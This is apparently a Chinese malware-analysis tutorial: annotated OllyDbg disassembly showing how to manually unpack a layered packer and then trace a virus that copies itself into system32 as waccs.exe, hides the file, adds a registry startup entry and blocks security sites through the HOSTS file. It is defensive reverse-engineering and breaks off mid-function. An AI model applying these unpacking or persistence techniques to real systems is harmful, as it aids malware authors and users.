00401F6D 81D1 B9200B37 ADC ECX,370B20B9
00401F73 C1DA 10 RCR EDX,10
00401F76 68 64000000 PUSH 64
00401F7B 68 DC000000 PUSH 0DC
00401F80 FF15 A2914100 CALL DWORD PTR DS:[4191A2] ; GDI32.GetMetaRgn
00401F86 81C9 196ABB10 OR ECX,10BB6A19
00401F8C 0B05 50F94000 OR EAX,DWORD PTR DS:[40F950]
00401F92 81E2 C985C27A AND EDX,7AC285C9
00401F98 68 5A000000 PUSH 5A
00401F9D FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401FA3 C1F9 06 SAR ECX,6
00401FA6 C1F0 0F SAL EAX,0F
00401FA9 B9 A58554AF MOV ECX,AF5485A5
00401FAE E9 0C000000 JMP misfotos.00401FBF
00401FB3 3305 D0FE4000 XOR EAX,DWORD PTR DS:[40FED0]
00401FB9 2315 00FB4000 AND EDX,DWORD PTR DS:[40FB00]
00401FBF C3 RETN
----------------------------------------------------------------------------------------------------
第三层:压缩壳
003C0000 55 PUSH EBP ; 第三层压缩壳入口处.[F8]向下走.
003C0001 8BEC MOV EBP,ESP
003C0003 81EC 90000000 SUB ESP,90
003C0009 E8 00000000 CALL 003C000E ; [F7]步入.
003C000E 58 POP EAX ; 步入后来到这里,继续[F8]向下走.
003C000F 8BF0 MOV ESI,EAX
003C0011 2D 2B144000 SUB EAX,40142B
003C0016 8945 A0 MOV DWORD PTR SS:[EBP-60],EAX
003C0019 81E6 00F0FFFF AND ESI,FFFFF000
003C001F 8975 B0 MOV DWORD PTR SS:[EBP-50],ESI
003C0022 8B75 04 MOV ESI,DWORD PTR SS:[EBP+4]
003C0025 81E6 00F0FFFF AND ESI,FFFFF000
003C002B 66:813E 4D5A CMP WORD PTR DS:[ESI],5A4D
003C0030 74 08 JE SHORT 003C003A
003C0032 81EE 00100000 SUB ESI,1000
003C0038 ^ EB F1 JMP SHORT 003C002B ; 这里的循环回跳不要跳.
003C003A 8B46 3C MOV EAX,DWORD PTR DS:[ESI+3C] ; 我们[F4]执行到这里,继续[F8]向下走.
003C003D 3D 00200000 CMP EAX,2000
003C0042 ^ 77 EE JA SHORT 003C0032
003C0044 03C6 ADD EAX,ESI
003C0046 8138 50450000 CMP DWORD PTR DS:[EAX],4550
003C004C ^ 75 E4 JNZ SHORT 003C0032
003C004E 8975 C8 MOV DWORD PTR SS:[EBP-38],ESI
003C0051 8B46 3C MOV EAX,DWORD PTR DS:[ESI+3C]
003C0054 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C0057 8B48 28 MOV ECX,DWORD PTR DS:[EAX+28]
003C005A 034D C8 ADD ECX,DWORD PTR SS:[EBP-38]
003C005D 894D AC MOV DWORD PTR SS:[EBP-54],ECX
003C0060 64:A1 30000000 MOV EAX,DWORD PTR FS:[30]
003C0066 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]
003C0069 8B40 1C MOV EAX,DWORD PTR DS:[EAX+1C]
003C006C 8B00 MOV EAX,DWORD PTR DS:[EAX]
003C006E 8B40 08 MOV EAX,DWORD PTR DS:[EAX+8]
003C0071 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
003C0074 B8 44332211 MOV EAX,11223344
003C0079 B8 44332211 MOV EAX,11223344
003C007E 68 00700000 PUSH 7000
003C0083 68 7BD1486C PUSH 6C48D17B
003C0088 68 691EAD0F PUSH 0FAD1E69
003C008D 68 00880000 PUSH 8800
003C0092 8F45 80 POP DWORD PTR SS:[EBP-80]
003C0095 8F85 70FFFFFF POP DWORD PTR SS:[EBP-90]
003C009B 8F45 94 POP DWORD PTR SS:[EBP-6C]
003C009E 8F45 9C POP DWORD PTR SS:[EBP-64]
003C00A1 8D35 8D184000 LEA ESI,DWORD PTR DS:[40188D]
003C00A7 0375 A0 ADD ESI,DWORD PTR SS:[EBP-60]
003C00AA 8D7D D8 LEA EDI,DWORD PTR SS:[EBP-28]
003C00AD 56 PUSH ESI
003C00AE 56 PUSH ESI
003C00AF FF75 F8 PUSH DWORD PTR SS:[EBP-8]
003C00B2 E8 22030000 CALL 003C03D9 ; 这个CALL可以直接[F8]步过.
003C00B7 AB STOS DWORD PTR ES:[EDI]
003C00B8 5E POP ESI
003C00B9 46 INC ESI
003C00BA 807E FF 00 CMP BYTE PTR DS:[ESI-1],0
003C00BE ^ 75 F9 JNZ SHORT 003C00B9 ; 这里的循环回跳不要跳.
003C00C0 803E AB CMP BYTE PTR DS:[ESI],0AB ; 我们[F4]执行到这里,继续[F8]向下走.
003C00C3 ^ 75 E8 JNZ SHORT 003C00AD ; 这里的循环回跳不要跳.
003C00C5 8B5D 94 MOV EBX,DWORD PTR SS:[EBP-6C] ; 我们[F4]执行到这里,继续[F8]向下走.
003C00C8 8B95 70FFFFFF MOV EDX,DWORD PTR SS:[EBP-90]
003C00CE 8B4D 80 MOV ECX,DWORD PTR SS:[EBP-80]
003C00D1 60 PUSHAD
003C00D2 6A 40 PUSH 40
003C00D4 68 00100000 PUSH 1000
003C00D9 51 PUSH ECX
003C00DA 6A 00 PUSH 0
003C00DC FF55 E8 CALL DWORD PTR SS:[EBP-18]
003C00DF 8945 90 MOV DWORD PTR SS:[EBP-70],EAX
003C00E2 0BC0 OR EAX,EAX
003C00E4 61 POPAD
003C00E5 0F84 D8020000 JE 003C03C3
003C00EB C1E9 02 SHR ECX,2
003C00EE 8B75 9C MOV ESI,DWORD PTR SS:[EBP-64]
003C00F1 0375 C8 ADD ESI,DWORD PTR SS:[EBP-38]
003C00F4 8B7D 90 MOV EDI,DWORD PTR SS:[EBP-70]
003C00F7 AD LODS DWORD PTR DS:[ESI]
003C00F8 2BC2 SUB EAX,EDX
003C00FA 33C3 XOR EAX,EBX
003C00FC AB STOS DWORD PTR ES:[EDI]
003C00FD ^ E2 F8 LOOPD SHORT 003C00F7 ; 这里的循环回跳不要跳.
003C00FF 8B45 90 MOV EAX,DWORD PTR SS:[EBP-70] ; 我们[F4]执行到这里,继续[F8]向下走.
003C0102 8B58 3C MOV EBX,DWORD PTR DS:[EAX+3C]
003C0105 035D 90 ADD EBX,DWORD PTR SS:[EBP-70]
003C0108 895D B4 MOV DWORD PTR SS:[EBP-4C],EBX
003C010B 8D83 F8000000 LEA EAX,DWORD PTR DS:[EBX+F8]
003C0111 8945 BC MOV DWORD PTR SS:[EBP-44],EAX
003C0114 0FB743 06 MOVZX EAX,WORD PTR DS:[EBX+6]
003C0118 8945 A4 MOV DWORD PTR SS:[EBP-5C],EAX
003C011B 8B43 28 MOV EAX,DWORD PTR DS:[EBX+28]
003C011E 8985 78FFFFFF MOV DWORD PTR SS:[EBP-88],EAX
003C0124 8B83 80000000 MOV EAX,DWORD PTR DS:[EBX+80]
003C012A 8945 98 MOV DWORD PTR SS:[EBP-68],EAX
003C012D 8B43 50 MOV EAX,DWORD PTR DS:[EBX+50]
003C0130 8985 74FFFFFF MOV DWORD PTR SS:[EBP-8C],EAX
003C0136 8B45 90 MOV EAX,DWORD PTR SS:[EBP-70]
003C0139 8B58 3C MOV EBX,DWORD PTR DS:[EAX+3C]
003C013C 035D C8 ADD EBX,DWORD PTR SS:[EBP-38]
003C013F 895D C4 MOV DWORD PTR SS:[EBP-3C],EBX
003C0142 81C3 F8000000 ADD EBX,0F8
003C0148 895D BC MOV DWORD PTR SS:[EBP-44],EBX
003C014B 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]
003C014E 50 PUSH EAX
003C014F 6A 40 PUSH 40
003C0151 FFB5 74FFFFFF PUSH DWORD PTR SS:[EBP-8C]
003C0157 FF75 C8 PUSH DWORD PTR SS:[EBP-38]
003C015A FF55 E4 CALL DWORD PTR SS:[EBP-1C]
003C015D 0BC0 OR EAX,EAX
003C015F 0F84 5E020000 JE 003C03C3
003C0165 8B8D 74FFFFFF MOV ECX,DWORD PTR SS:[EBP-8C]
003C016B C1E9 02 SHR ECX,2
003C016E 33C0 XOR EAX,EAX
003C0170 8B7D C8 MOV EDI,DWORD PTR SS:[EBP-38]
003C0173 F3:AB REP STOS DWORD PTR ES:[EDI]
003C0175 B9 00100000 MOV ECX,1000
003C017A 8B75 90 MOV ESI,DWORD PTR SS:[EBP-70]
003C017D 8B7D C8 MOV EDI,DWORD PTR SS:[EBP-38]
003C0180 E8 23020000 CALL 003C03A8 ; 这个CALL可以直接[F8]步过.
003C0185 8B55 A4 MOV EDX,DWORD PTR SS:[EBP-5C]
003C0188 8B5D B4 MOV EBX,DWORD PTR SS:[EBP-4C]
003C018B 81C3 F8000000 ADD EBX,0F8
003C0191 8B75 90 MOV ESI,DWORD PTR SS:[EBP-70]
003C0194 0373 14 ADD ESI,DWORD PTR DS:[EBX+14]
003C0197 8B7D C8 MOV EDI,DWORD PTR SS:[EBP-38]
003C019A 037B 0C ADD EDI,DWORD PTR DS:[EBX+C]
003C019D 8B4B 10 MOV ECX,DWORD PTR DS:[EBX+10]
003C01A0 E8 03020000 CALL 003C03A8 ; 这个CALL可以直接[F8]步过.
003C01A5 83C3 28 ADD EBX,28
003C01A8 4A DEC EDX
003C01A9 ^ 75 E6 JNZ SHORT 003C0191 ; 这里的循环回跳不要跳.
003C01AB 68 00800000 PUSH 8000 ; 我们[F4]执行到这里,继续[F8]向下走.
003C01B0 6A 00 PUSH 0
003C01B2 FF75 90 PUSH DWORD PTR SS:[EBP-70]
003C01B5 FF55 EC CALL DWORD PTR SS:[EBP-14]
003C01B8 8B5D C4 MOV EBX,DWORD PTR SS:[EBP-3C]
003C01BB 8B83 80000000 MOV EAX,DWORD PTR DS:[EBX+80]
003C01C1 0BC0 OR EAX,EAX
003C01C3 0F84 9B000000 JE 003C0264
003C01C9 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C01CC 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
003C01CF C745 B8 0000000>MOV DWORD PTR SS:[EBP-48],0
003C01D6 8B5D FC MOV EBX,DWORD PTR SS:[EBP-4]
003C01D9 8B43 0C MOV EAX,DWORD PTR DS:[EBX+C]
003C01DC 0BC0 OR EAX,EAX
003C01DE 0F84 80000000 JE 003C0264
003C01E4 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C01E7 50 PUSH EAX
003C01E8 50 PUSH EAX
003C01E9 FF55 DC CALL DWORD PTR SS:[EBP-24]
003C01EC 0BC0 OR EAX,EAX
003C01EE 59 POP ECX
003C01EF 75 04 JNZ SHORT 003C01F5
003C01F1 51 PUSH ECX
003C01F2 FF55 E0 CALL DWORD PTR SS:[EBP-20]
003C01F5 8945 C0 MOV DWORD PTR SS:[EBP-40],EAX
003C01F8 8B5D FC MOV EBX,DWORD PTR SS:[EBP-4]
003C01FB 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10]
003C01FE 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C0201 8945 A8 MOV DWORD PTR SS:[EBP-58],EAX
003C0204 8B03 MOV EAX,DWORD PTR DS:[EBX]
003C0206 0BC0 OR EAX,EAX
003C0208 75 14 JNZ SHORT 003C021E
003C020A 8B45 A8 MOV EAX,DWORD PTR SS:[EBP-58]
003C020D 2B45 C8 SUB EAX,DWORD PTR SS:[EBP-38]
003C0210 3D FFFFAF00 CMP EAX,0AFFFFF
003C0215 77 44 JA SHORT 003C025B
003C0217 3D 00100000 CMP EAX,1000
003C021C 72 3D JB SHORT 003C025B
003C021E 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C0221 8945 D4 MOV DWORD PTR SS:[EBP-2C],EAX
003C0224 8B75 D4 MOV ESI,DWORD PTR SS:[EBP-2C]
003C0227 0375 B8 ADD ESI,DWORD PTR SS:[EBP-48]
003C022A 8B36 MOV ESI,DWORD PTR DS:[ESI]
003C022C 0BF6 OR ESI,ESI
003C022E 74 2B JE SHORT 003C025B
003C0230 8BC6 MOV EAX,ESI
003C0232 25 00000080 AND EAX,80000000
003C0237 74 08 JE SHORT 003C0241
003C0239 81E6 FFFFFF4F AND ESI,4FFFFFFF
003C023F EB 06 JMP SHORT 003C0247
003C0241 0375 C8 ADD ESI,DWORD PTR SS:[EBP-38]
003C0244 83C6 02 ADD ESI,2
003C0247 56 PUSH ESI
003C0248 FF75 C0 PUSH DWORD PTR SS:[EBP-40]
003C024B FF55 D8 CALL DWORD PTR SS:[EBP-28]
003C024E 8B7D B8 MOV EDI,DWORD PTR SS:[EBP-48]
003C0251 037D A8 ADD EDI,DWORD PTR SS:[EBP-58]
003C0254 AB STOS DWORD PTR ES:[EDI]
003C0255 8345 B8 04 ADD DWORD PTR SS:[EBP-48],4
003C0259 ^ EB C9 JMP SHORT 003C0224 ; 这里的循环回跳不要跳.
003C025B 8345 FC 14 ADD DWORD PTR SS:[EBP-4],14 ; 我们[F4]执行到这里,继续[F8]向下走.
003C025F ^ E9 6BFFFFFF JMP 003C01CF ; 这里的循环回跳不要跳.
003C0264 8B45 C4 MOV EAX,DWORD PTR SS:[EBP-3C] ; 我们[F4]执行到这里,继续[F8]向下走.
003C0267 8B70 34 MOV ESI,DWORD PTR DS:[EAX+34]
003C026A 8975 88 MOV DWORD PTR SS:[EBP-78],ESI
003C026D 8BB0 A0000000 MOV ESI,DWORD PTR DS:[EAX+A0]
003C0273 0BF6 OR ESI,ESI
003C0275 74 47 JE SHORT 003C02BE
003C0277 FFB0 A4000000 PUSH DWORD PTR DS:[EAX+A4]
003C027D 8F45 CC POP DWORD PTR SS:[EBP-34]
003C0280 0375 C8 ADD ESI,DWORD PTR SS:[EBP-38]
003C0283 8B5D C8 MOV EBX,DWORD PTR SS:[EBP-38]
003C0286 2B5D 88 SUB EBX,DWORD PTR SS:[EBP-78]
003C0289 AD LODS DWORD PTR DS:[ESI]
003C028A 8BF8 MOV EDI,EAX
003C028C AD LODS DWORD PTR DS:[ESI]
003C028D 8BC8 MOV ECX,EAX
003C028F 83F8 08 CMP EAX,8
003C0292 7E 2A JLE SHORT 003C02BE
003C0294 294D CC SUB DWORD PTR SS:[EBP-34],ECX
003C0297 83E9 08 SUB ECX,8
003C029A D1E9 SHR ECX,1
003C029C 33C0 XOR EAX,EAX
003C029E 66:AD LODS WORD PTR DS:[ESI]
003C02A0 8BD0 MOV EDX,EAX
003C02A2 C1EA 0C SHR EDX,0C
003C02A5 83FA 03 CMP EDX,3
003C02A8 75 0C JNZ SHORT 003C02B6
003C02AA 25 FF0F0000 AND EAX,0FFF
003C02AF 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C02B2 03C7 ADD EAX,EDI
003C02B4 0118 ADD DWORD PTR DS:[EAX],EBX
003C02B6 ^ E2 E4 LOOPD SHORT 003C029C
003C02B8 837D CC 00 CMP DWORD PTR SS:[EBP-34],0
003C02BC ^ 7F CB JG SHORT 003C0289
003C02BE 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
003C02C1 0185 78FFFFFF ADD DWORD PTR SS:[EBP-88],EAX
003C02C7 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
003C02CA 3B85 78FFFFFF CMP EAX,DWORD PTR SS:[EBP-88]
003C02D0 75 0A JNZ SHORT 003C02DC
003C02D2 C785 78FFFFFF 0>MOV DWORD PTR SS:[EBP-88],0
003C02DC 8B4D C8 MOV ECX,DWORD PTR SS:[EBP-38]
003C02DF 64:A1 18000000 MOV EAX,DWORD PTR FS:[18]
003C02E5 8B40 30 MOV EAX,DWORD PTR DS:[EAX+30]
003C02E8 8B70 08 MOV ESI,DWORD PTR DS:[EAX+8]
003C02EB 3B75 C8 CMP ESI,DWORD PTR SS:[EBP-38]
003C02EE 74 1E JE SHORT 003C030E
003C02F0 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]
003C02F3 8B40 1C MOV EAX,DWORD PTR DS:[EAX+1C]
003C02F6 BA 00100000 MOV EDX,1000
003C02FB 4A DEC EDX
003C02FC 74 10 JE SHORT 003C030E
003C02FE 8B00 MOV EAX,DWORD PTR DS:[EAX]
003C0300 3B48 08 CMP ECX,DWORD PTR DS:[EAX+8]
003C0303 ^ 75 F6 JNZ SHORT 003C02FB
003C0305 8BB5 78FFFFFF MOV ESI,DWORD PTR SS:[EBP-88]
003C030B 8970 0C MOV DWORD PTR DS:[EAX+C],ESI
003C030E 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]
003C0311 50 PUSH EAX
003C0312 6A 20 PUSH 20
003C0314 FFB5 74FFFFFF PUSH DWORD PTR SS:[EBP-8C]
003C031A FF75 C8 PUSH DWORD PTR SS:[EBP-38]
003C031D FF55 E4 CALL DWORD PTR SS:[EBP-1C]
003C0320 8B75 C4 MOV ESI,DWORD PTR SS:[EBP-3C]
003C0323 0FB74E 06 MOVZX ECX,WORD PTR DS:[ESI+6]
003C0327 81C6 F8000000 ADD ESI,0F8
003C032D 60 PUSHAD
003C032E 8B46 24 MOV EAX,DWORD PTR DS:[ESI+24]
003C0331 25 00000080 AND EAX,80000000
003C0336 74 13 JE SHORT 003C034B
003C0338 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]
003C033B 50 PUSH EAX
003C033C 6A 40 PUSH 40
003C033E FF76 08 PUSH DWORD PTR DS:[ESI+8]
003C0341 8B46 0C MOV EAX,DWORD PTR DS:[ESI+C]
003C0344 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C0347 50 PUSH EAX
003C0348 FF55 E4 CALL DWORD PTR SS:[EBP-1C]
003C034B 61 POPAD
003C034C 83C6 28 ADD ESI,28
003C034F ^ E2 DC LOOPD SHORT 003C032D ; 这里的循环回跳不要跳.
003C0351 83BD 78FFFFFF 0>CMP DWORD PTR SS:[EBP-88],0 ; 我们[F4]执行到这里,继续[F8]向下走.
003C0358 75 26 JNZ SHORT 003C0380
003C035A 8BE5 MOV ESP,EBP
003C035C 5D POP EBP
003C035D 83C4 04 ADD ESP,4
003C0360 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]
003C0364 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
003C0368 8B5C24 10 MOV EBX,DWORD PTR SS:[ESP+10]
003C036C 8B6C24 08 MOV EBP,DWORD PTR SS:[ESP+8]
003C0370 8B7424 04 MOV ESI,DWORD PTR SS:[ESP+4]
003C0374 8B3C24 MOV EDI,DWORD PTR SS:[ESP]
003C0377 83C4 20 ADD ESP,20
003C037A B8 01000000 MOV EAX,1
003C037F C3 RETN
003C0380 8B85 78FFFFFF MOV EAX,DWORD PTR SS:[EBP-88]
003C0386 8BE5 MOV ESP,EBP
003C0388 5D POP EBP
003C0389 83C4 04 ADD ESP,4
003C038C 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]
003C0390 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]
003C0394 8B5C24 10 MOV EBX,DWORD PTR SS:[ESP+10]
003C0398 8B6C24 08 MOV EBP,DWORD PTR SS:[ESP+8]
003C039C 8B7424 04 MOV ESI,DWORD PTR SS:[ESP+4]
003C03A0 8B3C24 MOV EDI,DWORD PTR SS:[ESP]
003C03A3 83C4 20 ADD ESP,20
003C03A6 - FFE0 JMP EAX ; 这里是关键跳转,它会跳向下一个OEP入口处.
003C03A8 52 PUSH EDX
003C03A9 8BD1 MOV EDX,ECX
003C03AB C1E9 02 SHR ECX,2
003C03AE 83E2 03 AND EDX,3
003C03B1 0BC9 OR ECX,ECX
003C03B3 74 02 JE SHORT 003C03B7
003C03B5 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
003C03B7 03CA ADD ECX,EDX
003C03B9 0BC9 OR ECX,ECX
003C03BB 74 04 JE SHORT 003C03C1
003C03BD 8BCA MOV ECX,EDX
003C03BF F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
003C03C1 5A POP EDX
003C03C2 C3 RETN
----------------------------------------------------------------------------------------------------
手脱完毕,程序的真实入口:
00402B96 55 PUSH EBP ; 这里是脱壳后的真实入口,在这里就可以DUMP了(输入表没有被破坏,脱壳保存后样本可以正常运行).
00402B97 8BEC MOV EBP,ESP
00402B99 81EC E4070000 SUB ESP,7E4
00402B9F 6A 01 PUSH 1
00402BA1 FF15 A0804000 CALL DWORD PTR DS:[4080A0] ; kernel32.SetErrorMode
00402BA7 68 04010000 PUSH 104
00402BAC 6A 00 PUSH 0
00402BAE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BB4 50 PUSH EAX
00402BB5 E8 80440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
00402BBA 83C4 0C ADD ESP,0C
00402BBD 68 04010000 PUSH 104
00402BC2 6A 00 PUSH 0
00402BC4 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402BCA 50 PUSH EAX
00402BCB E8 6A440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
00402BD0 83C4 0C ADD ESP,0C
00402BD3 68 04010000 PUSH 104
00402BD8 6A 00 PUSH 0
00402BDA 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402BE0 50 PUSH EAX
00402BE1 E8 54440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
00402BE6 83C4 0C ADD ESP,0C
00402BE9 68 04010000 PUSH 104
00402BEE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BF4 50 PUSH EAX
00402BF5 6A 00 PUSH 0
00402BF7 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA
00402BFD 50 PUSH EAX
00402BFE FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA
00402C04 68 04010000 PUSH 104
00402C09 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402C0F 50 PUSH EAX
00402C10 FF15 94804000 CALL DWORD PTR DS:[408094] ; kernel32.GetSystemDirectoryA
----------------------------------------------------------------------------------------------------
****************************************************************************************************
二、样本分析部分:
----------------------------------------------------------------------------------------------------
1、当样本执行安装功能时的分析:
00402B96 55 PUSH EBP ; 程序入口.
00402B97 8BEC MOV EBP,ESP
00402B99 81EC E4070000 SUB ESP,7E4
00402B9F 6A 01 PUSH 1 ; ErrorMode = SEM_FAILCRITICALERRORS
00402BA1 FF15 A0804000 CALL DWORD PTR DS:[4080A0] ; kernel32.SetErrorMode
00402BA7 68 04010000 PUSH 104
00402BAC 6A 00 PUSH 0
00402BAE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BB4 50 PUSH EAX
00402BB5 E8 80440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
00402BBA 83C4 0C ADD ESP,0C
00402BBD 68 04010000 PUSH 104
00402BC2 6A 00 PUSH 0
00402BC4 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402BCA 50 PUSH EAX
00402BCB E8 6A440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
00402BD0 83C4 0C ADD ESP,0C
00402BD3 68 04010000 PUSH 104
00402BD8 6A 00 PUSH 0
00402BDA 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402BE0 50 PUSH EAX
00402BE1 E8 54440000 CALL misfotos.0040703A ; JMP 到 msvcrt.memset
00402BE6 83C4 0C ADD ESP,0C
00402BE9 68 04010000 PUSH 104
00402BEE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BF4 50 PUSH EAX
00402BF5 6A 00 PUSH 0
00402BF7 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA
00402BFD 50 PUSH EAX
00402BFE FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA(获取程序自身当前路径名).
00402C04 68 04010000 PUSH 104
00402C09 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402C0F 50 PUSH EAX
00402C10 FF15 94804000 CALL DWORD PTR DS:[408094] ; kernel32.GetSystemDirectoryA(获取系统SYSTEM32文件夹路径名).
00402C16 68 1BD7A201 PUSH 1A2D71B
00402C1B 8D8D 8CF8FFFF LEA ECX,DWORD PTR SS:[EBP-774]
00402C21 E8 4A040000 CALL misfotos.00403070 ; ASCII "waccs.exe"
00402C26 50 PUSH EAX
00402C27 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402C2D 50 PUSH EAX
00402C2E 68 C9276909 PUSH 96927C9
00402C33 8D8D 84F8FFFF LEA ECX,DWORD PTR SS:[EBP-77C]
00402C39 E8 D2030000 CALL misfotos.00403010 ; ASCII "%s\%s"
00402C3E 50 PUSH EAX
00402C3F 68 04010000 PUSH 104
00402C44 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402C4A 50 PUSH EAX
00402C4B E8 F0430000 CALL misfotos.00407040 ; JMP 到 msvcrt._snprintf(ASCII "C:\WINDOWS\system32\waccs.exe").
00402C50 83C4 14 ADD ESP,14
00402C53 8D8D 84F8FFFF LEA ECX,DWORD PTR SS:[EBP-77C]
00402C59 E8 28F3FFFF CALL misfotos.00401F86 ; 清除内存数据.
00402C5E 8D8D 8CF8FFFF LEA ECX,DWORD PTR SS:[EBP-774]
00402C64 E8 85F4FFFF CALL misfotos.004020EE ; 清除内存数据.
00402C69 68 2FD7A201 PUSH 1A2D72F
00402C6E 8D8D 78F8FFFF LEA ECX,DWORD PTR SS:[EBP-788]
00402C74 E8 F7030000 CALL misfotos.00403070 ; ASCII "waccs.exe"
00402C79 50 PUSH EAX
00402C7A E8 F1140000 CALL misfotos.00404170 ; 在注册表中添加病毒启动项.
00402C7F 59 POP ECX
00402C80 8D8D 78F8FFFF LEA ECX,DWORD PTR SS:[EBP-788]
00402C86 E8 63F4FFFF CALL misfotos.004020EE ; 清除内存数据.
00402C8B 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402C91 50 PUSH EAX ; /s2 = "C:\Documents and Settings\Coderui\桌面\virus.exe"
00402C92 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402C98 50 PUSH EAX ; |s1 = "C:\WINDOWS\system32\waccs.exe"
00402C99 E8 04440000 CALL misfotos.004070A2 ; JMP 到 msvcrt.strcmp(字符串比较)
00402C9E 59 POP ECX
00402C9F 59 POP ECX
00402CA0 85C0 TEST EAX,EAX ; 判断比较结果.
00402CA2 74 70 JE SHORT misfotos.00402D14 ; 如果s2 != s1,则该病毒程序执行安装(安装功能)操作;如果s2 == s1,则该病毒程序执行恶意(主要功能)操作.
00402CA4 83A5 A8F8FFFF 0>AND DWORD PTR SS:[EBP-758],0 ; 如果s2 != s1,则该病毒程序从这里开始执行安装操作.
00402CAB EB 0D JMP SHORT misfotos.00402CBA
00402CAD 8B85 A8F8FFFF MOV EAX,DWORD PTR SS:[EBP-758]
00402CB3 40 INC EAX
00402CB4 8985 A8F8FFFF MOV DWORD PTR SS:[EBP-758],EAX
00402CBA 83BD A8F8FFFF 0>CMP DWORD PTR SS:[EBP-758],5
00402CC1 7D 1E JGE SHORT misfotos.00402CE1
00402CC3 6A 00 PUSH 0 ; /FailIfExists = FALSE
00402CC5 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402CCB 50 PUSH EAX ; |NewFileName = "C:\WINDOWS\system32\waccs.exe"
00402CCC 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402CD2 50 PUSH EAX ; |s2 = "C:\Documents and Settings\Coderui\桌面\virus.exe"
00402CD3 FF15 90804000 CALL DWORD PTR DS:[408090] ; kernel32.CopyFileA
00402CD9 85C0 TEST EAX,EAX ; 判断执行的结果.
00402CDB 74 02 JE SHORT misfotos.00402CDF ; 如果文件拷贝成功,则不执行跳转功能;如果文件拷贝失败,则跳到"00402CDF"地址处.
00402CDD EB 02 JMP SHORT misfotos.00402CE1 ; 文件拷贝成功,跳到"00402CE1"地址处继续执行后面的操作.
00402CDF ^ EB CC JMP SHORT misfotos.00402CAD ; 跳回去重新执行文件拷贝操作代码.
00402CE1 6A 07 PUSH 7
00402CE3 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754] ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00402CE9 50 PUSH EAX ; |FileName = "C:\WINDOWS\system32\waccs.exe"
00402CEA FF15 8C804000 CALL DWORD PTR DS:[40808C] ; kernel32.SetFileAttributesA(设置文件属性为:只读、系统、隐藏).
00402CF0 6A 00 PUSH 0
00402CF2 6A 00 PUSH 0
00402CF4 6A 00 PUSH 0
00402CF6 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402CFC 50 PUSH EAX ; FileName = "C:\WINDOWS\system32\waccs.exe"
00402CFD 68 C4914000 PUSH misfotos.004091C4 ; ASCII "open"
00402D02 6A 00 PUSH 0
00402D04 FF15 74814000 CALL DWORD PTR DS:[408174] ; SHELL32.ShellExecuteA(调用运行拷贝后的病毒程序"waccs.exe").
00402D0A E8 61060000 CALL misfotos.00403370 ; 在HOSTS域名映像劫持文件中添加N个安全网站域名地址,不让用户访问这些网站.
00402D0F E8 F9120000 CALL misfotos.0040400D ; 安装程序关闭退出,并执行自我删除操作.
00402D14 FF15 88804000 CALL DWORD PTR DS:[408088] ; ntdll.RtlGetLastWin32Error(如果s2 == s1,则该病毒程序从这里开始执行恶意操作.)
----------------------------------------------------------
在注册表中添加病毒启动项:
00404170 55 PUSH EBP
00404171 8BEC MOV EBP,ESP
00404173 81EC 8C000000 SUB ESP,8C
00404179 6A 00 PUSH 0
0040417B 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
0040417E 50 PUSH EAX
0040417F 6A 00 PUSH 0
00404181 68 3F000F00 PUSH 0F003F
00404186 6A 00 PUSH 0
00404188 6A 00 PUSH 0
